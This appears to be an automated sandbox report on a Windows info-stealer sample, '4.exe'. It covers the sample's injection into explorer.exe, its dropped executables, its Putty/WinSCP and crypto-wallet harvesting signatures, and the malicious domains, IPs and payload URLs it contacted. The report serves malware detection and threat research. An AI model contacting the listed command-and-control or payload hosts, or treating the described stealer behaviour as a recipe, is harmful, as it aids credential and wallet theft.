                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447651 Sample: 4.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 100 65 whispedwoodmoodsksl.shop 2->65 67 steamcommunity.com 2->67 69 dbfhns.in 2->69 87 Snort IDS alert for network traffic 2->87 89 Multi AV Scanner detection for domain / URL 2->89 91 Found malware configuration 2->91 93 15 other signatures 2->93 11 4.exe 2->11         started        14 sdveeeu 2->14         started        signatures3 process4 signatures5 111 Detected unpacking (changes PE section rights) 11->111 113 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->113 115 Maps a DLL or memory area into another process 11->115 125 2 other signatures 11->125 16 explorer.exe 62 7 11->16 injected 117 Antivirus detection for dropped file 14->117 119 Multi AV Scanner detection for dropped file 14->119 121 Machine Learning detection for dropped file 14->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->123 process6 dnsIp7 59 185.18.245.58, 52736, 52737, 52738 UNINETAZ Azerbaijan 16->59 61 23.145.40.124, 49749, 80 SURFAIRWIRELESS-IN-01US Reserved 16->61 63 3 other IPs or domains 16->63 41 C:\Users\user\AppData\Roaming\sdveeeu, PE32 16->41 dropped 43 C:\Users\user\AppData\Local\Temp\F441.exe, PE32 16->43 dropped 45 C:\Users\user\AppData\Local\Temp\9EDA.exe, PE32 16->45 dropped 47 C:\Users\user\...\sdveeeu:Zone.Identifier, ASCII 16->47 dropped 79 System process connects to network (likely due to code injection or exploit) 16->79 81 Benign windows process drops PE files 16->81 83 Deletes itself after installation 16->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->85 21 9EDA.exe 1 16->21         started        25 F441.exe 16->25         started        file8 signatures9 process10 dnsIp11 49 C:\Users\user\AppData\Local\...\kat796E.tmp, PE32 21->49 dropped 95 Machine Learning detection for dropped file 21->95 97 Contains functionality to inject code into remote processes 21->97 99 Writes to foreign memory regions 21->99 107 3 other signatures 21->107 28 kat796E.tmp 1 45 21->28         started        71 whispedwoodmoodsksl.shop 188.114.96.3, 443, 49745, 49747 CLOUDFLARENETUS European Union 25->71 73 185.235.137.54, 52654, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 25->73 101 Antivirus detection for dropped file 25->101 103 Multi AV Scanner detection for dropped file 25->103 105 Detected unpacking (changes PE section rights) 25->105 109 5 other signatures 25->109 33 WerFault.exe 21 25->33         started        file12 signatures13 process14 dnsIp15 75 steamcommunity.com 104.102.42.29, 443, 52660 AKAMAI-ASUS United States 28->75 77 65.109.242.59, 443, 52662, 52663 ALABANZA-BALTUS United States 28->77 51 C:\Users\user\AppData\...\softokn3[1].dll, PE32 28->51 dropped 53 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 28->53 dropped 55 C:\Users\user\AppData\...\mozglue[1].dll, PE32 28->55 dropped 57 10 other files (6 malicious) 28->57 dropped 127 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 28->127 129 Found many strings related to Crypto-Wallets (likely being stolen) 28->129 131 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->131 133 5 other signatures 28->133 35 cmd.exe 28->35         started        file16 signatures17 process18 process19 37 conhost.exe 35->37         started        39 timeout.exe 35->39         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                4.exe39%ReversingLabs
                4.exe45%VirustotalBrowse
                4.exe100%AviraHEUR/AGEN.1311176
                4.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\sdveeeu100%AviraHEUR/AGEN.1311176
                C:\Users\user\AppData\Local\Temp\F441.exe100%AviraTR/AVI.AceCrypter.javlp
                C:\Users\user\AppData\Roaming\sdveeeu100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\9EDA.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\F441.exe100%Joe Sandbox ML
                C:\ProgramData\HJJJECFIECBG\freebl3.dll0%ReversingLabs
                C:\ProgramData\HJJJECFIECBG\mozglue.dll0%ReversingLabs
                C:\ProgramData\HJJJECFIECBG\msvcp140.dll0%ReversingLabs
                C:\ProgramData\HJJJECFIECBG\nss3.dll0%ReversingLabs
                C:\ProgramData\HJJJECFIECBG\softokn3.dll0%ReversingLabs
                C:\ProgramData\HJJJECFIECBG\vcruntime140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\F441.exe96%ReversingLabsWin32.Spyware.Lummastealer
                C:\Users\user\AppData\Local\Temp\kat796E.tmp4%ReversingLabs
                C:\Users\user\AppData\Roaming\sdveeeu39%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                whispedwoodmoodsksl.shop17%VirustotalBrowse
                steamcommunity.com0%VirustotalBrowse
                dbfhns.in5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://aka.ms/odirmr0%URL Reputationsafe
                https://aka.ms/odirmr0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                https://www.youtube.com0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                https://wns.windows.com/L0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
                whispedwoodmoodsksl.shop100%Avira URL Cloudmalware
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                whispedwoodmoodsksl.shop17%VirustotalBrowse
                https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                http://guteyr.cc/tmp/index.php13%VirustotalBrowse
                http://guteyr.cc/tmp/index.php0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%URL Reputationsafe
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%URL Reputationsafe
                https://lv.queniujq.cn0%URL Reputationsafe
                https://www.youtube.com/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                https://65.109.242.59/nss3.dll0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
                https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                https://checkout.steampowered.com/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                https://outlook.com_0%URL Reputationsafe
                https://65.109.242.59/f0%Avira URL Cloudsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%URL Reputationsafe
                https://s.ytimg.com;0%Avira URL Cloudsafe
                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%URL Reputationsafe
                https://help.steampowered.com/en/0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                https://t.me/copterwin0%Avira URL Cloudsafe
                http://x1.c.lencr.org/00%URL Reputationsafe
                http://x1.i.lencr.org/00%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
                https://login.steampowered.com/0%URL Reputationsafe
                https://65.109.242.59/t0%Avira URL Cloudsafe
                https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                https://store.steampowered.com/legal/0%URL Reputationsafe
                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent0%URL Reputationsafe
                https://store.steampowered.com/0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                https://65.109.242.59/x0%Avira URL Cloudsafe
                https://65.109.242.59/v0%Avira URL Cloudsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                https://65.109.242.59/f13%VirustotalBrowse
                https://t.me/copterwin1%VirustotalBrowse
                https://65.109.242.59/D0%Avira URL Cloudsafe
                https://65.109.242.59/B0%Avira URL Cloudsafe
                https://65.109.242.59/t4%VirustotalBrowse
                https://65.109.242.59/A0%Avira URL Cloudsafe
                https://65.109.242.59/v0%VirustotalBrowse
                https://t.me/copterwinr0isMozilla/5.00%Avira URL Cloudsafe
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                https://65.109.242.59/x0%VirustotalBrowse
                https://65.109.242.59/D0%VirustotalBrowse
                https://65.109.242.59/kX0%Avira URL Cloudsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://65.109.242.59/A0%VirustotalBrowse
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse
                https://65.109.242.59/freebl3.dll0%Avira URL Cloudsafe
                http://45.129.96.86/file/update.exe100%Avira URL Cloudmalware
                https://t.me/copterwinr0isMozilla/5.00%VirustotalBrowse
                https://65.109.242.59/U0%Avira URL Cloudsafe
                https://whispedwoodmoodsksl.shop/l100%Avira URL Cloudmalware
                https://65.109.242.59/B0%VirustotalBrowse
                https://community.clo0%Avira URL Cloudsafe
                https://www.google.com/recaptcha/0%Avira URL Cloudsafe
                http://45.129.96.86/file/update.exe20%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                whispedwoodmoodsksl.shop
                		188.114.96.3
                		truetrueunknown
                steamcommunity.com
                		104.102.42.29
                		truetrueunknown
                dbfhns.in
                		190.28.110.209
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                whispedwoodmoodsksl.shoptrue
                • 17%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://guteyr.cc/tmp/index.phptrue
                • 13%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/nss3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/freebl3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                http://45.129.96.86/file/update.exetrue
                • 20%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://steamcommunity.com/profiles/76561199689717899true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/mozglue.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/vcruntime140.dllfalse
                • Avira URL Cloud: safe
                		unknown
                holicisticscrarws.shoptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/chrome_newtabF441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                • URL Reputation: safe
                		unknown
                https://www.gstatic.cn/recaptcha/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englikat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • URL Reputation: safe
                		unknown
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.valvesoftware.com/legal.htmkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • URL Reputation: safe
                		unknown
                https://www.youtube.comkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exekat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/fkat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmpfalse
                • 13%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://s.ytimg.com;kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/copterwin9EDA.exe, 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/tkat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmpfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/xkat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/vkat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1697094973.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/Dkat796E.tmp, 00000009.00000003.2393803566.00000000008CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/Bkat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2550138162.0000000000932000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/Akat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://t.me/copterwinr0isMozilla/5.0kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/kXkat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jskat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctakat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                • URL Reputation: safe
                		unknown
                http://ocsp.rootca1.amazontrust.com0:F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/Tkat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.ecosia.org/newtab/F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://lv.queniujq.cnkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.youtube.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/Ukat796E.tmp, 00000009.00000003.2548139998.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/lF441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.clokat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/recaptcha/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://checkout.steampowered.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
